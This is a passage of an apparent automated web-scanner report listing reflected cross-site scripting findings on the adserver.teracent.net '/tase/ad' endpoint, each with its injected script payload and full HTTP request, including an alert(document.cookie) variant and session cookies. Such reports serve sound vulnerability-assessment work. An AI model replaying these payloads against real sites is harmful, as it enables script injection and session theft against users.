Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the Redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f538"><script>alert(1)</script>d0808468015 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=2f538"><script>alert(1)</script>d0808468015 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.15. http://adserver.teracent.net/tase/ad [Redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d19ae"-alert(1)-"c6e6f69cf49 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=d19ae"-alert(1)-"c6e6f69cf49 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.16. http://adserver.teracent.net/tase/ad [Segments parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d118"-alert(1)-"ae01b33c400 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,1496439d118"-alert(1)-"ae01b33c400&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.17. http://adserver.teracent.net/tase/ad [Segments parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the Segments request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c11df"><script>alert(1)</script>1d93e77bc17 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643c11df"><script>alert(1)</script>1d93e77bc17&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.18. http://adserver.teracent.net/tase/ad [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc202"-alert(1)-"3e687818da was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438bc202"-alert(1)-"3e687818da&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.19. http://adserver.teracent.net/tase/ad [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the TargetID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7798"><script>alert(1)</script>c562a1c893e was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438e7798"><script>alert(1)</script>c562a1c893e&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.20. http://adserver.teracent.net/tase/ad [Targets parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the Targets request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf4f"><script>alert(1)</script>8f9396390d1 was submitted in the Targets parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977fbf4f"><script>alert(1)</script>8f9396390d1&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.21. http://adserver.teracent.net/tase/ad [Targets parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the Targets request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2713"-alert(1)-"cfdec192739 was submitted in the Targets parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977f2713"-alert(1)-"cfdec192739&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.22. http://adserver.teracent.net/tase/ad [Values parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f765"-alert(1)-"eb22a847e48 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,439209f765"-alert(1)-"eb22a847e48&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.23. http://adserver.teracent.net/tase/ad [Values parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the Values request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45923"><script>alert(1)</script>d2ae93715fd was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,4392045923"><script>alert(1)</script>d2ae93715fd&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.24. http://adserver.teracent.net/tase/ad [adId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the adId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b73"><script>alert(1)</script>1b3a06602a6 was submitted in the adId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_73691725b73"><script>alert(1)</script>1b3a06602a6&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.25. http://adserver.teracent.net/tase/ad [adId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the adId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffbe3"%3balert(1)//c59190afeff was submitted in the adId parameter. This input was echoed as ffbe3";alert(1)//c59190afeff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917ffbe3"%3balert(1)//c59190afeff&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.26. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6f79"><script>alert(1)</script>36adda61ff3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=&f6f79"><script>alert(1)</script>36adda61ff3=1 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.27. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c3ae"-alert(1)-"9e56efdf5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=&4c3ae"-alert(1)-"9e56efdf5e=1 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.28. http://adserver.teracent.net/tase/ad [rcu parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the rcu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbcfe"-alert(1)-"4a1deec2b00 was submitted in the rcu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=clickcbcfe"-alert(1)-"4a1deec2b00&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
